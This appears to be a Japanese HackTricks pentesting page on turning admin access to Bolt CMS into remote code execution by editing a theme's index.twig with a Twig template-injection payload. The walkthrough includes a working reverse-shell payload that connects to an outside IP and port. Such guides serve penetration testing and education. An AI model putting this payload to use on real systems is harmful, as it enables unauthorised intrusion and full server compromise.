HackTricksBolt CMS
Reading time: 3 minutes
tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:
HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
RCE
管理者としてログインした後(/botに移動してログインプロンプトにアクセス)、Bolt CMSでRCEを取得できます:
Configuration->View Configuration->Main Configurationを選択するか、URLパス/bolt/file-edit/config?file=/bolt/config.yamlに移動します。- テーマの値を確認します。
.png)
File management->View & edit templatesを選択します。- 前のステップで見つけたテーマベース(この場合は
base-2021)を選択し、index.twigを選択します。 - 私の場合、これはURLパス/bolt/file-edit/themes?file=/base-2021/index.twigにあります。
- template injection (Twig)を介してこのファイルにペイロードを設定します。例:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - 変更を保存します。
.png)
Maintenance->Clear the cacheでキャッシュをクリアします。- 再度、通常のユーザーとしてページにアクセスすると、ペイロードが実行されるはずです。
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。